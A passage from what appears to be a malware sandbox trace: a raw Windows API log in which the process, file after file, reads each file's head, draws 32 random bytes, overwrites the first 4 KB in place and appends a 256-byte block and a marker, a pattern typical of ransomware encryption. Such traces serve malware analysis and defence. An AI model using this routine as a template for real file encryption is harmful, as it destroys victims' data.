dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.070] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.071] GetProcessHeap () returned 0x4f10000 [0084.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.072] GetProcessHeap () returned 0x4f10000 [0084.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.073] GetProcessHeap () returned 0x4f10000 [0084.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.073] GetProcessHeap () returned 0x4f10000 [0084.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.073] GetProcessHeap () returned 0x4f10000 [0084.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.073] GetProcessHeap () returned 0x4f10000 [0084.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.073] GetProcessHeap () returned 0x4f10000 [0084.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.073] GetProcessHeap () returned 0x4f10000 [0084.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.074] GetProcessHeap () returned 0x4f10000 [0084.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.074] GetProcessHeap () returned 0x4f10000 [0084.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.074] GetProcessHeap () returned 0x4f10000 [0084.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.074] SetFilePointerEx (in: hFile=0x8fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.075] WriteFile (in: hFile=0x8fc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0084.075] WriteFile (in: hFile=0x8fc, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0084.075] GetProcessHeap () returned 0x4f10000 [0084.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0084.075] GetProcessHeap () returned 0x4f10000 [0084.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.075] GetProcessHeap () returned 0x4f10000 [0084.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.075] CloseHandle (hObject=0x8fc) returned 1 [0084.077] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 124 [0084.077] SetFilePointerEx (in: hFile=0x970, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.077] ReadFile (in: hFile=0x970, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0084.077] SetFilePointerEx (in: hFile=0x970, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.077] GetProcessHeap () returned 0x4f10000 [0084.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.077] GetProcessHeap () returned 0x4f10000 [0084.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.077] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.077] GetProcessHeap () returned 0x4f10000 [0084.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0084.077] ReadFile (in: hFile=0x970, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.125] SetFilePointerEx (in: hFile=0x970, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.125] WriteFile (in: hFile=0x970, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.125] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.126] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.127] GetProcessHeap () returned 0x4f10000 [0084.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.128] GetProcessHeap () returned 0x4f10000 [0084.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.129] GetProcessHeap () returned 0x4f10000 [0084.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.129] SetFilePointerEx (in: hFile=0x970, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.129] WriteFile (in: hFile=0x970, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0084.130] WriteFile (in: hFile=0x970, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0084.130] GetProcessHeap () returned 0x4f10000 [0084.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0084.130] GetProcessHeap () returned 0x4f10000 [0084.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.130] GetProcessHeap () returned 0x4f10000 [0084.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.130] CloseHandle (hObject=0x970) returned 1 [0084.132] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 125 [0084.132] SetFilePointerEx (in: hFile=0x974, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.132] ReadFile (in: hFile=0x974, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0084.132] SetFilePointerEx (in: hFile=0x974, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.132] GetProcessHeap () returned 0x4f10000 [0084.133] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.133] GetProcessHeap () returned 0x4f10000 [0084.133] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.133] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.133] GetProcessHeap () returned 0x4f10000 [0084.133] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0084.133] ReadFile (in: hFile=0x974, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.180] SetFilePointerEx (in: hFile=0x974, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.180] WriteFile (in: hFile=0x974, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.180] GetProcessHeap () returned 0x4f10000 [0084.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.180] GetProcessHeap () returned 0x4f10000 [0084.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.180] GetProcessHeap () returned 0x4f10000 [0084.180] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.180] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.181] GetProcessHeap () returned 0x4f10000 [0084.181] HeapFree (in: hHeap=0x4f10000, 